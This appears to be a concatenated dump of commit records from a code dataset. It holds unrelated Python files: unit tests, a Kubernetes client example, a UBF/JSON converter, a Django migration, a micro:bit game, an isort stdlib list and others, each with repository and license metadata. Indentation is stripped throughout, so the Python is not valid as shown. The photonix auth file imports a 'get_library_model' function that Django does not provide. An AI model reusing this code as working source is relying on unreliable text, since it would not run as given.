Test case for functions in OvfTransport.py
"""
import unittest, os
import hashlib
from subprocess import call
from subprocess import Popen
from subprocess import PIPE
from subprocess import STDOUT
from ovf import OvfTransport
TEST_FILES_DIR = os.path.join(os.path.dirname(__file__), "test_files/")
def compareFileMD5s(isoFileName, sourceFile, isoEnvFile=None):
"""
Dump isoEnvFile on isoFileName. Compare it's md5 sum to the sum
for sourceFile.
"""
isoinfoCmd = ["isoinfo", "-JR", "-i", isoFileName, "-x", ""]
# the way this is done assumes a reasonable sized env file. if
# the size of these files get bigger, this algorithm would need
# to be changed
sourcemd5 = hashlib.md5()
sfd = open(sourceFile)
fileContents = sfd.read()
sourcemd5.update(fileContents)
sfd.close()
# run command to dump file out of iso
if not isoEnvFile:
isoEnvFile = os.path.basename(sourceFile)
isoinfoCmd[5] = '/' + isoEnvFile
pcmd = Popen(isoinfoCmd, stdout=PIPE, stderr=STDOUT)
isodump = pcmd.communicate()[0]
targetmd5 = hashlib.md5()
targetmd5.update(isodump)
return sourcemd5.digest() == targetmd5.digest()
class OvfTransportTestCase(unittest.TestCase):
"""
Test OvfTransport functions
"""
path = TEST_FILES_DIR
outIsoFile = path + 'ourOVF.iso'
inEnvFile = path + 'test-environment.xml'
def test_selectISOProgram(self):
"""
Test OvfTransport.selectISOProgram
"""
isoProgs = ['genisoimage', 'mkisofs']
# inspect the system to see what's installed and where
for prog in isoProgs:
retcode = call(["which", prog], stdout=PIPE, stderr=STDOUT)
if not retcode:
isoProg = OvfTransport.selectISOProgram()
assert isoProg == prog, "failed test for: " + prog
return
self.fail("no ISO format programs available on system")
def test_makeISOTransport(self):
"""
Test OvfTransport.makeISOTransport
"""
makeFileList = [(self.outIsoFile, [self.inEnvFile])]
OvfTransport.makeISOTransport(makeFileList)
# validate the generated image
self.assertTrue(os.path.exists(self.outIsoFile),
'ISO file was not created')
retcode = call(["which", "isoinfo"], stdout=PIPE, stderr=STDOUT)
if not retcode:
# for each file, dump the file and calc the md5 sum. compare
# that to the one for the original file.
# the way this is done assumes a reasonable sized env file. if
# the size of these files get bigger, this algorithm would need
# to be changed
# check the env file first
for (outfilename, infilelist) in makeFileList:
self.assertTrue(compareFileMD5s(outfilename, infilelist[0],
'ovf-env.xml'),
'MD5 miscompare')
restOfFiles = infilelist[1:]
for curFile in restOfFiles:
# assert the two are equal
self.assertTrue(compareFileMD5s(outfilename, curFile),
'MD5 mismatch')
if __name__ == "__main__":
TEST = unittest.TestLoader().loadTestsFromTestCase(OvfTransportTestCase)
RUNNER = unittest.TextTestRunner(verbosity=2)
RUNNER.run(unittest.TestSuite(TEST))
| epl-1.0 | Python | |
307816d3b6cb5e57f50f80e10eccd0a701c698a9 | Fix syntax errors. | sonium0/pymatgen,migueldiascosta/pymatgen,migueldiascosta/pymatgen,Bismarrck/pymatgen,yanikou19/pymatgen,ctoher/pymatgen,Bismarrck/pymatgen,ctoher/pymatgen,sonium0/pymatgen,Bismarrck/pymatgen,Bismarrck/pymatgen,Dioptas/pymatgen,migueldiascosta/pymatgen,Bismarrck/pymatgen,rousseab/pymatgen,rousseab/pymatgen,sonium0/pymatgen,rousseab/pymatgen,yanikou19/pymatgen,Dioptas/pymatgen,yanikou19/pymatgen,ctoher/pymatgen | pymatgen/io/abinitio/__init__.py | pymatgen/io/abinitio/__init__.py | from .eos import *
from .pseudos import *
from .netcdf import *
from .events import *
from .tasks import *
from .workflows import *
from .calculations import *
| from .calculations import *
from .eos import *
from .pseudos import *
from .netcdf import *
from .events import *
from .task import *
from .workflow import *
| mit | Python |
d4e6f44c5257afd02883bd739cf6b3953e398857 | Create auth.py | damianmoore/photo-manager,damianmoore/photo-manager,damianmoore/photo-manager,damianmoore/photo-manager | photonix/photos/auth.py | photonix/photos/auth.py | import os
from django.contrib.auth import get_library_model
import graphene
from graphene_django.types import DjangoObjectType
import graphql_jwt
Library = get_library_model()
class Mutation(graphene.ObjectType):
token_auth = graphql_jwt.ObtainJSONWebToken.Field()
verify_token = graphql_jwt.Verify.Field()
refresh_token = graphql_jwt.Refresh.Field()
revoke_token = graphql_jwt.Revoke.Field()
class UserType(DjangoObjectType):
class Meta:
model = Library
class Environment(graphene.ObjectType):
demo = graphene.Boolean()
first_run = graphene.Boolean()
class Query(graphene.ObjectType):
profile = graphene.Field(UserType)
environment = graphene.Field(Environment)
def resolve_profile(self, info):
user = info.context.user
if user.is_anonymous:
raise Exception('Not logged in')
return user
def resolve_environment(self, info):
return {
'demo': os.environ.get('DEMO', False),
'first_run': False,
}
| agpl-3.0 | Python | |
fca1765fa57dfe047b74594883048ee2a8f473dc | Create cluster_scoped_custom_object.py | kubernetes-client/python,kubernetes-client/python | examples/cluster_scoped_custom_object.py | examples/cluster_scoped_custom_object.py | # Copyright 2019 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Uses a Custom Resource Definition (CRD) to create a custom object, in this case
a CronTab. This example use an example CRD from this tutorial:
https://kubernetes.io/docs/tasks/access-kubernetes-api/custom-resources/custom-resource-definitions/
Apply the following yaml manifest to create a cluster-scoped CustomResourceDefinition (CRD)
apiVersion: apiextensions.k8s.io/v1
kind: CustomResourceDefinition
metadata:
name: crontabs.stable.example.com
spec:
group: stable.example.com
versions:
- name: v1
served: true
storage: true
schema:
openAPIV3Schema:
type: object
properties:
spec:
type: object
properties:
cronSpec:
type: string
image:
type: string
replicas:
type: integer
scope: Cluster
names:
plural: crontabs
singular: crontab
kind: CronTab
shortNames:
- ct
"""
from pprint import pprint
from kubernetes import client, config
def main():
config.load_kube_config()
api = client.CustomObjectsApi()
# definition of custom resource
test_resource = {
"apiVersion": "stable.example.com/v1",
"kind": "CronTab",
"metadata": {"name": "test-crontab"},
"spec": {"cronSpec": "* * * * */5", "image": "my-awesome-cron-image"},
}
# patch to update the `spec.cronSpec` field
cronspec_patch = {
"spec": {"cronSpec": "* * * * */15", "image": "my-awesome-cron-image"}
}
# patch to add the `metadata.labels` field
metadata_label_patch = {
"metadata": {
"labels": {
"foo": "bar",
}
}
}
# create a cluster scoped resource
created_resource = api.create_cluster_custom_object(
group="stable.example.com",
version="v1",
plural="crontabs",
body=test_resource,
)
# get the cluster scoped resource
resource = api.get_cluster_custom_object(
group="stable.example.com",
version="v1",
name="test-crontab",
plural="crontabs",
)
print("%s\t\t%s" % ("NAME", "SCHEDULE"))
print(
"%s\t%s\n" %
(resource["metadata"]["name"],
resource["spec"]["cronSpec"]))
# patch the `spec.cronSpec` field of the custom resource
patched_resource = api.patch_cluster_custom_object(
group="stable.example.com",
version="v1",
plural="crontabs",
name="test-crontab",
body=cronspec_patch,
)
print("%s\t\t%s" % ("NAME", "PATCHED_SCHEDULE"))
print(
"%s\t%s\n" %
(patched_resource["metadata"]["name"],
patched_resource["spec"]["cronSpec"]))
# patch the `metadata.labels` field of the custom resource
patched_resource = api.patch_cluster_custom_object(
group="stable.example.com",
version="v1",
plural="crontabs",
name="test-crontab",
body=metadata_label_patch,
)
print("%s\t\t%s" % ("NAME", "PATCHED_LABELS"))
print(
"%s\t%s\n" %
(patched_resource["metadata"]["name"],
patched_resource["metadata"]["labels"]))
# delete the custom resource "test-crontab"
api.delete_cluster_custom_object(
group="stable.example.com",
version="v1",
name="test-crontab",
plural="crontabs",
body=client.V1DeleteOptions(),
)
print("Resource `test-crontab` deleted!")
if __name__ == "__main__":
main()
| apache-2.0 | Python | |
bda8b764dca26d9dae2d81da630b5e1328a9aa51 | implement simple python helper for ubf and jsf | hibari/ubf,ubf/ubf,cloudian/ubf,ubf/ubf,ubf/ubf,cloudian/ubf,hibari/ubf,cloudian/ubf,hibari/ubf,hibari/ubf | priv/python/pyubf.py | priv/python/pyubf.py |
##
## $Id: pyubf.py 132283 2009-04-15 14:54:16Z norton $
##
##
## UBF primitives:
##
## integer, float, atom, string, binary, tuple, record, list, term, void
##
def Integer(value):
assert isinstance(value, int) or isinstance(value, long)
return value
def Float(value):
assert isinstance(value, float)
return value
class Atom(str):
def __init__(self, value):
assert isinstance(value, str)
str.__init__(self, value)
def __repr__(self):
return "<ubf-atom: %s>" % `str.__repr__(self)`
class String(str):
def __init__(self, value):
assert isinstance(value, str)
str.__init__(self, value)
def __repr__(self):
return "<ubf-string: %s>" % `str.__repr__(self)`
def Binary(value):
assert isinstance(value, str) or isinstance(value, unicode)
return value
def Tuple(value):
assert isinstance(value, tuple)
return value
class Record(dict):
def __init__(self, name, fields):
assert isinstance(name, str) and isinstance(fields, dict)
dict.__init__(self, fields)
self.name = name
def __repr__(self):
return "<ubf-record: %s %s>" % (self.name, `dict.__repr__(self)`)
def List(value):
assert isinstance(value, list)
return value
##
## pyjson -> pyubf
##
def from_pyjson(value):
if value is None:
return value
elif isinstance(value, bool):
return value
elif isinstance(value, int) or isinstance(value, long):
return Integer(value)
elif isinstance(value, float):
return Float(value)
elif isinstance(value, str) or isinstance(value, unicode):
return Binary(value)
elif isinstance(value, dict):
if value.keys() == ['$A']:
return Atom(value['$A'])
elif value.keys() == ['$S']:
return String(value['$S'])
elif value.keys() == ['$T']:
return Tuple(tuple(from_pyjson(value['$T'])))
elif value.has_key('$R') and len(value.keys()) > 1:
name = value['$R']
del value['$R']
fields = dict([ [k, from_pyjson(v)] for k, v in value.iteritems() ])
return Record(name, fields)
else:
raise RuntimeError, 'unknown dict ~s' % repr(value)
elif isinstance(value, list):
return [ from_pyjson(v) for v in value ]
else:
raise RuntimeError, 'unknown object ~s' % repr(value)
##
## pyubf -> pyjson
##
def to_pyjson(value):
if value is None:
return value
elif isinstance(value, bool):
return value
elif isinstance(value, int) or isinstance(value, long):
return value
elif isinstance(value, float):
return value
elif isinstance(value, Atom):
return {'$A' : str(value)}
elif isinstance(value, String):
return {'$S' : str(value)}
elif isinstance(value, str):
return value
elif isinstance(value, unicode):
return value
elif isinstance(value, tuple):
return {'$T' : [ to_pyjson(v) for v in list(value) ]}
elif isinstance(value, Record):
record = dict([ [k, to_pyjson(v)] for k, v in value.iteritems() ])
record.update({'$R' : value.name})
return record
elif isinstance(value, list):
return [ to_pyjson(v) for v in value ]
else:
raise RuntimeError, 'unknown object ~s' % repr(value)
| mit | Python | |
ed05755f1f5213cdd95203f51d0097bfbd91e6e1 | Create FindtheDifference_BitandHash.py | Chasego/codi,cc13ny/algo,Chasego/cod,Chasego/codirit,cc13ny/algo,Chasego/cod,cc13ny/Allin,Chasego/cod,Chasego/codirit,Chasego/cod,Chasego/cod,cc13ny/algo,Chasego/codi,cc13ny/Allin,cc13ny/Allin,cc13ny/Allin,cc13ny/Allin,Chasego/codi,Chasego/codirit,Chasego/codi,Chasego/codirit,cc13ny/algo,Chasego/codirit,cc13ny/algo,Chasego/codi | leetcode/389-Find-the-Difference/FindtheDifference_BitandHash.py | leetcode/389-Find-the-Difference/FindtheDifference_BitandHash.py | class Solution(object):
def findTheDifference(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
chrs = {}
res = 0
for w in t:
if w not in chrs:
chrs[w] = 1 << (ord(w) - 97)
res += chrs[w]
for w in s:
res -= chrs[w]
return chr(len(bin(res)) + 94)
| mit | Python | |
fddcad6de86d8d1dbd37c549b0d4258260c13a3a | Read in sample text file 'proteinGroups.txt' | dmyersturnbull/pynd-pubs-ms | proteinGroups.py | proteinGroups.py | # -*- coding: utf-8 -*-
"""
Created on Thu Oct 8 20:48:41 2015
@author: student
"""
import pandas as pd
#import numpy as np
# read in file
df = pd.read_table('/Users/student/Desktop/pubs/Sample text files/proteinGroups.txt', index_col=0)
#print df.dtypes
print df['Intensity'] | apache-2.0 | Python | |
558d45ed0b9c3d375daa81383125e0c4664df7af | Add adwaita-icon-theme | BansheeMediaPlayer/bockbuild,BansheeMediaPlayer/bockbuild,BansheeMediaPlayer/bockbuild | packages/adwaita-icon-theme.py | packages/adwaita-icon-theme.py | GnomeXzPackage ('adwaita-icon-theme', version_major = '3.16', version_minor = '2.1')
| mit | Python | |
7a068ebb9a50e7c1c77cada56b96586cb322066c | Add collect tests. | sievetech/rgc | test/test_collect.py | test/test_collect.py | # -*- coding: utf-8 -*-
import os
import mock
import unittest
from rgc.rules import Rule, namehasprefix, namehassuffix
from rgc import collect
class TestCollect(unittest.TestCase):
def setUp(self):
os.environ['user'] = 'john'
os.environ['key'] = '12345abcd'
def test_dryrun_no_rule_true_collects_everything(self):
mock_obj = mock.MagicMock()
mock_obj.name = 'blargh'
mock_cont = mock.MagicMock()
mock_cont.get_objects.return_value = [mock_obj]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont]
mock_conn.get_container.return_value = mock_cont
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=Rule())
self.assertIn(mock.call.delete_object(mock_obj.name), mock_cont.method_calls)
self.assertItemsEqual(['blargh'], deleted)
def test_dryrun_yes_rule_true_does_not_collect(self):
mock_obj = mock.MagicMock()
mock_obj.name = 'blargh'
mock_cont = mock.MagicMock()
mock_cont.get_objects.return_value = [mock_obj]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont]
mock_conn.get_container.return_value = mock_cont
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=Rule(), dryrun=True)
self.assertNotIn(mock.call.delete_object(mock_obj.name), mock_cont.method_calls)
self.assertItemsEqual([mock_obj.name], deleted)
def test_collect_applies_rule(self):
mock_obj1 = mock.MagicMock()
mock_obj1.name = 'pref_name_suf'
mock_obj2 = mock.MagicMock()
mock_obj2.name = 'noprefnosuf'
mock_cont = mock.MagicMock()
mock_cont.get_objects.return_value = [mock_obj1, mock_obj2]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont]
mock_conn.get_container.return_value = mock_cont
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=namehasprefix('pref')&namehassuffix('suf'))
self.assertIn(mock.call.delete_object(mock_obj1.name), mock_cont.method_calls)
self.assertNotIn(mock.call.delete_object(mock_obj2.name), mock_cont.method_calls)
self.assertItemsEqual([mock_obj1.name], deleted)
def test_specific_container(self):
mock_obj1 = mock.MagicMock()
mock_obj1.name = 'mock1'
mock_cont1 = mock.MagicMock()
mock_cont1.name = 'container1'
mock_cont1.get_objects.return_value = [mock_obj1]
mock_obj2 = mock.MagicMock()
mock_obj2.name = 'mock2'
mock_cont2 = mock.MagicMock()
mock_cont2.name = 'container2'
mock_cont2.get_objects.return_value = [mock_obj2]
mock_conn = mock.MagicMock()
mock_conn.get_all_containers.return_value = [mock_cont1, mock_cont2]
mock_conn.get_container.return_value = mock_cont1
with mock.patch('cloudfiles.get_connection', return_value=mock_conn):
deleted = collect(rule=Rule(), container='container1')
self.assertIn(mock.call.delete_object(mock_obj1.name), mock_cont1.method_calls)
self.assertNotIn(mock.call.delete_object(mock_obj2.name), mock_cont2.method_calls)
self.assertItemsEqual([mock_obj1.name], deleted)
if __name__ == '__main__':
unittest.main()
| bsd-3-clause | Python | |
af2a0a851be91931f96a7e9d44a1e8c460d70918 | Migrate creation date to new casebooks | harvard-lil/h2o,harvard-lil/h2o,harvard-lil/h2o,harvard-lil/h2o | web/main/migrations/0052_migrate_casebook_dates.py | web/main/migrations/0052_migrate_casebook_dates.py | # Generated by Django 2.2.10 on 2020-04-14 11:38
from django.db import migrations
from main.models import Casebook
def copy_old_dates(app, schema):
update_cbs = []
for casebook in Casebook.objects.select_related('old_casebook').all():
if casebook.old_casebook:
casebook.created_at = casebook.old_casebook.created_at
update_cbs.append(casebook)
Casebook.objects.bulk_update(update_cbs, ['created_at'])
class Migration(migrations.Migration):
dependencies = [
('main', '0051_auto_20200407_1714'),
]
operations = [
migrations.RunPython(copy_old_dates, migrations.RunPython.noop)
]
| agpl-3.0 | Python | |
7e53ec5de1d094eafa6a0bba6efcdaf845d5a7b8 | Create 0007.py | Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2,Yrthgze/prueba-sourcetree2,Show-Me-the-Code/python,Show-Me-the-Code/python,Show-Me-the-Code/python,Yrthgze/prueba-sourcetree2 | pylyria/0007/0007.py | pylyria/0007/0007.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# Copyright By PyLyria
# CreateTime: 2016-03-04 19:36:40
import os
def get_path(root = os.curdir):
root += os.sep
for path, dirs, files in os.walk(root):
for file_name in files:
yield path, file_name
def get_lines(file_name):
with open(file_name,'rt',encoding='utf-8') as f:
for line in f:
yield line.strip()
if __name__ == '__main__':
paths = get_path()
format = ('.py', '.c', '.cpp', '.sql')
annotation = ('#', '//', '--', '/*')
code_statistics = {}
for path, file_name in paths:
if file_name.endswith(format):
code_statistics[file_name] = {}
lines = get_lines(path + os.sep + file_name)
for line in lines:
if len(line) ==0:
code_statistics[file_name]['EmptyLine'] = code_statistics[file_name].get('EmptyLine', 0) + 1
elif line.startswith(annotation):
code_statistics[file_name]['AnnotationLine'] = code_statistics[file_name].get('AnnotationLine', 0) + 1
else:
code_statistics[file_name]['CodeLine'] = code_statistics[file_name].get('CodeLine', 0) + 1
print(code_statistics)
| mit | Python | |
0b4c873ad2d0923e88fbee5b52435ff1ee68d03c | Create PedidoVer.py | AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb,AEDA-Solutions/matweb | backend/Models/Grau/PedidoVer.py | backend/Models/Grau/PedidoVer.py | from Framework.Pedido import Pedido
from Framework.ErroNoHTTP import ErroNoHTTP
class PedidoVer(Pedido):
def __init__(self,variaveis_do_ambiente):
super(PedidoVer, self).__init__(variaveis_do_ambiente)
try:
self.id = self.corpo['id']
except:
raise ErroNoHTTP(400)
def getId(self):
return self.id
| mit | Python | |
d72f6c0d989c3f40d460b1ce5d45b7ebf27ec295 | create tests for kornia | Kaggle/docker-python,Kaggle/docker-python | tests/test_kornia.py | tests/test_kornia.py | import unittest
import cv2
import torch
import kornia
class TestOpenCV(unittest.TestCase):
def test_imread_opencv(self):
img = cv2.imread('/input/tests/data/dot.png')
img_t = kornia.image_to_tensor(img)
self.assertEqual(img.shape, (1, 1, 3))
self.assertEqual(img_t.shape, (3, 1, 1))
def test_grayscale_torch(self):
img_rgb = torch.rand(2, 3, 4, 5)
img_gray = kornia.rgb_to_grayscale(img_rgb)
self.assertEqual(img_gray.shape, (2, 1, 4, 5))
| apache-2.0 | Python | |
e3d0681cf2e449b06abebabb7e8726079997eb01 | Add reflex game | OiNutter/microbit-scripts | reflex/reflex.py | reflex/reflex.py | from microbit import *
import random
score = 0
pixel = None
fade_step = 300
clicked = False
MAX_PAUSE = 3000
def get_rand_coord(limit=4):
return random.randint(0, limit)
def get_rand_side():
return random.choice([-1, 1])
def handle_correct_click(i):
global score, clicked
clicked = True
score += (i+1)*10
display.set_pixel(pixel[0], pixel[1], 0)
sleep(1000)
display.scroll("REFLEX")
display.scroll('Press any button to play', wait=False, loop=True)
while True:
if button_a.is_pressed() or button_b.is_pressed():
print("start playing")
break
display.clear()
while True:
for y in range(0, 5):
display.set_pixel(2, y, 5)
for r in range(1, 16):
print("ROUND %d" % r)
wait_time = random.random()*MAX_PAUSE
print ("WAIT %d", wait_time)
start_time = running_time()
diff = 0
while diff <= wait_time:
new_time = running_time()
diff = new_time - start_time
y = get_rand_coord()
x = (get_rand_side() * (get_rand_coord(1)+1)) + 2
pixel = (x, y)
print(pixel)
clicked = False
for i in range(9, -1, -1):
display.set_pixel(pixel[0], pixel[1], i)
start_time = running_time()
diff = 0
while diff <= fade_step and not clicked:
if x < 2:
if button_a.is_pressed():
handle_correct_click(i)
break
elif button_b.is_pressed():
score -= 10
elif x > 2:
if button_b.is_pressed():
handle_correct_click(i)
break
elif button_a.is_pressed():
score -= 10
new_time = running_time()
diff = new_time - start_time
pixel = None
if r % 5 == 0:
fade_step -= 25
print ("%d: %d" % (r, fade_step))
display.scroll("Score: %d" % score, wait=False, loop=True)
while True:
if button_a.is_pressed() or button_b.is_pressed():
display.clear()
break
| mit | Python | |
998e7ac87ef6e96bb5d421860683f87e8b373428 | Create view.py | rajrohith/blobstore,rajrohith/blobstore | blobstore-python/src/app/view.py | blobstore-python/src/app/view.py | apache-2.0 | Python | ||
a174eb57037254f6277a9418db407995ea9aff9c | Add python 3.9 imports | PyCQA/isort,PyCQA/isort | isort/stdlibs/py39.py | isort/stdlibs/py39.py | """
File contains the standard library of Python 3.9.
DO NOT EDIT. If the standard library changes, a new list should be created
using the mkstdlibs.py script.
"""
stdlib = {
"_thread",
"abc",
"aifc",
"argparse",
"array",
"ast",
"asynchat",
"asyncio",
"asyncore",
"atexit",
"audioop",
"base64",
"bdb",
"binascii",
"binhex",
"bisect",
"builtins",
"bz2",
"cProfile",
"calendar",
"cgi",
"cgitb",
"chunk",
"cmath",
"cmd",
"code",
"codecs",
"codeop",
"collections",
"colorsys",
"compileall",
"concurrent",
"configparser",
"contextlib",
"contextvars",
"copy",
"copyreg",
"crypt",
"csv",
"ctypes",
"curses",
"dataclasses",
"datetime",
"dbm",
"decimal",
"difflib",
"dis",
"distutils",
"doctest",
"email",
"encodings",
"ensurepip",
"enum",
"errno",
"faulthandler",
"fcntl",
"filecmp",
"fileinput",
"fnmatch",
"formatter",
"fractions",
"ftplib",
"functools",
"gc",
"getopt",
"getpass",
"gettext",
"glob",
"graphlib",
"grp",
"gzip",
"hashlib",
"heapq",
"hmac",
"html",
"http",
"imaplib",
"imghdr",
"imp",
"importlib",
"inspect",
"io",
"ipaddress",
"itertools",
"json",
"keyword",
"lib2to3",
"linecache",
"locale",
"logging",
"lzma",
"mailbox",
"mailcap",
"marshal",
"math",
"mimetypes",
"mmap",
"modulefinder",
"msilib",
"msvcrt",
"multiprocessing",
"netrc",
"nis",
"nntplib",
"numbers",
"operator",
"optparse",
"os",
"ossaudiodev",
"parser",
"pathlib",
"pdb",
"pickle",
"pickletools",
"pipes",
"pkgutil",
"platform",
"plistlib",
"poplib",
"posix",
"pprint",
"profile",
"pstats",
"pty",
"pwd",
"py_compile",
"pyclbr",
"pydoc",
"queue",
"quopri",
"random",
"re",
"readline",
"reprlib",
"resource",
"rlcompleter",
"runpy",
"sched",
"secrets",
"select",
"selectors",
"shelve",
"shlex",
"shutil",
"signal",
"site",
"smtpd",
"smtplib",
"sndhdr",
"socket",
"socketserver",
"spwd",
"sqlite3",
"ssl",
"stat",
"statistics",
"string",
"stringprep",
"struct",
"subprocess",
"sunau",
"symbol",
"symtable",
"sys",
"sysconfig",
"syslog",
"tabnanny",
"tarfile",
"telnetlib",
"tempfile",
"termios",
"test",
"textwrap",
"threading",
"time",
"timeit",
"tkinter",
"token",
"tokenize",
"trace",
"traceback",
"tracemalloc",
"tty",
"turtle",
"turtledemo",
"types",
"typing",
"unicodedata",
"unittest",
"urllib",
"uu",
"uuid",
"venv",
"warnings",
"wave",
"weakref",
"webbrowser",
"winreg",
"winsound",
"wsgiref",
"xdrlib",
"xml",
"xmlrpc",
"zipapp",
"zipfile",
"zipimport",
"zlib",
"zoneinfo",
}
| mit | Python | |
9c22d354da4c09d2e98b657d334e7594df1042d7 | Create q2.py | pollseed/python_script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/python_script_lib,pollseed/python_script_lib,pollseed/script_lib,pollseed/script_lib,pollseed/script_lib | work/q2.py | work/q2.py | def union(arr1, arr2):
result = []
for i in range(1, len(arr1)):
result.append(arr1[i])
result.append(arr2[i])
return result
def create_array():
return [x for x in range(0,100)]
print(union(create_array(), create_array()))
| mit | Python | |
4e1f87bf7805d20e52015b8c283181e4035de54b | Create _init_.py | FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code,FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code,FinancialSentimentAnalysis-team/Finanical-annual-reports-analysis-code | luowang/tools/tree-tagger-windows-3.2/TreeTagger/cmd/_init_.py | luowang/tools/tree-tagger-windows-3.2/TreeTagger/cmd/_init_.py | apache-2.0 | Python | ||
40ef5b1a6347d54eeb043c64f36286768b41dc3e | Add lldbToolBox.py scaffolding in ./utils for adding lldb python helpers to use when debugging swift. | shahmishal/swift,gribozavr/swift,JGiola/swift,allevato/swift,karwa/swift,huonw/swift,JGiola/swift,nathawes/swift,glessard/swift,shajrawi/swift,shahmishal/swift,harlanhaskins/swift,roambotics/swift,jmgc/swift,harlanhaskins/swift,allevato/swift,ahoppen/swift,tkremenek/swift,gregomni/swift,karwa/swift,ahoppen/swift,rudkx/swift,stephentyrone/swift,JGiola/swift,karwa/swift,tkremenek/swift,jopamer/swift,glessard/swift,xedin/swift,practicalswift/swift,tjw/swift,atrick/swift,alblue/swift,hooman/swift,amraboelela/swift,airspeedswift/swift,danielmartin/swift,shajrawi/swift,gribozavr/swift,airspeedswift/swift,danielmartin/swift,amraboelela/swift,lorentey/swift,roambotics/swift,glessard/swift,alblue/swift,allevato/swift,aschwaighofer/swift,zisko/swift,CodaFi/swift,huonw/swift,xedin/swift,alblue/swift,stephentyrone/swift,allevato/swift,CodaFi/swift,xedin/swift,allevato/swift,nathawes/swift,austinzheng/swift,rudkx/swift,apple/swift,stephentyrone/swift,devincoughlin/swift,hooman/swift,brentdax/swift,parkera/swift,huonw/swift,shajrawi/swift,huonw/swift,roambotics/swift,atrick/swift,glessard/swift,benlangmuir/swift,devincoughlin/swift,devincoughlin/swift,harlanhaskins/swift,natecook1000/swift,hooman/swift,danielmartin/swift,gregomni/swift,jmgc/swift,amraboelela/swift,rudkx/swift,tjw/swift,hooman/swift,glessard/swift,danielmartin/swift,brentdax/swift,sschiau/swift,practicalswift/swift,jopamer/swift,hooman/swift,xwu/swift,brentdax/swift,jckarter/swift,austinzheng/swift,brentdax/swift,rudkx/swift,CodaFi/swift,roambotics/swift,airspeedswift/swift,aschwaighofer/swift,sschiau/swift,stephentyrone/swift,xedin/swift,devincoughlin/swift,xedin/swift,lorentey/swift,atrick/swift,natecook1000/swift,benlangmuir/swift,sschiau/swift,apple/swift,natecook1000/swift,stephentyrone/swift,natecook1000/swift,zisko/swift,gribozavr/swift,gregomni/swift,natecook100
0/swift,danielmartin/swift,parkera/swift,shahmishal/swift,JGiola/swift,lorentey/swift,jopamer/swift,amraboelela/swift,stephentyrone/swift,apple/swift,parkera/swift,tkremenek/swift,airspeedswift/swift,benlangmuir/swift,austinzheng/swift,airspeedswift/swift,practicalswift/swift,devincoughlin/swift,tjw/swift,CodaFi/swift,allevato/swift,sschiau/swift,practicalswift/swift,tkremenek/swift,karwa/swift,jopamer/swift,sschiau/swift,zisko/swift,tjw/swift,lorentey/swift,brentdax/swift,alblue/swift,practicalswift/swift,CodaFi/swift,zisko/swift,shajrawi/swift,lorentey/swift,austinzheng/swift,jmgc/swift,parkera/swift,atrick/swift,zisko/swift,xwu/swift,shajrawi/swift,gribozavr/swift,gribozavr/swift,devincoughlin/swift,roambotics/swift,airspeedswift/swift,tjw/swift,apple/swift,jmgc/swift,gregomni/swift,natecook1000/swift,huonw/swift,rudkx/swift,jckarter/swift,lorentey/swift,zisko/swift,JGiola/swift,lorentey/swift,benlangmuir/swift,gregomni/swift,natecook1000/swift,parkera/swift,roambotics/swift,jmgc/swift,xedin/swift,lorentey/swift,ahoppen/swift,alblue/swift,brentdax/swift,jckarter/swift,aschwaighofer/swift,karwa/swift,amraboelela/swift,amraboelela/swift,gregomni/swift,amraboelela/swift,xwu/swift,rudkx/swift,karwa/swift,glessard/swift,apple/swift,xwu/swift,sschiau/swift,JGiola/swift,nathawes/swift,aschwaighofer/swift,atrick/swift,parkera/swift,shajrawi/swift,tjw/swift,hooman/swift,tkremenek/swift,xwu/swift,harlanhaskins/swift,parkera/swift,tkremenek/swift,aschwaighofer/swift,shahmishal/swift,shahmishal/swift,allevato/swift,danielmartin/swift,ahoppen/swift,austinzheng/swift,benlangmuir/swift,aschwaighofer/swift,xwu/swift,airspeedswift/swift,huonw/swift,xedin/swift,sschiau/swift,nathawes/swift,shahmishal/swift,jckarter/swift,xedin/swift,hooman/swift,austinzheng/swift,jckarter/swift,devincoughlin/swift,tkremenek/swift,gribozavr/swift,nathawes/swift,apple/swift,danielmartin/swift,brentdax/swift,sschiau/swift,gribozavr/swift,shahmishal/swift,stephentyrone/swift,jopamer/swift,zisko/swift,
shajrawi/swift,jmgc/swift,atrick/swift,harlanhaskins/swift,nathawes/swift,alblue/swift,xwu/swift,CodaFi/swift,gribozavr/swift,tjw/swift,shahmishal/swift,devincoughlin/swift,alblue/swift,jmgc/swift,practicalswift/swift,jckarter/swift,aschwaighofer/swift,jopamer/swift,CodaFi/swift,shajrawi/swift,harlanhaskins/swift,huonw/swift,harlanhaskins/swift,benlangmuir/swift,practicalswift/swift,parkera/swift,austinzheng/swift,ahoppen/swift,jckarter/swift,karwa/swift,practicalswift/swift,karwa/swift,ahoppen/swift,nathawes/swift,jopamer/swift | utils/lldbToolBox.py | utils/lldbToolBox.py | """
LLDB Helpers for working with the swift compiler.
Load into LLDB with 'command script import /path/to/lldbToolBox.py'
This will also import LLVM data formatters as well, assuming that llvm is next
to the swift checkout.
"""
import os
REPO_BASE = os.path.abspath(os.path.join(__file__, os.pardir, os.pardir,
os.pardir))
SWIFT_REPO = os.path.join(REPO_BASE, "swift")
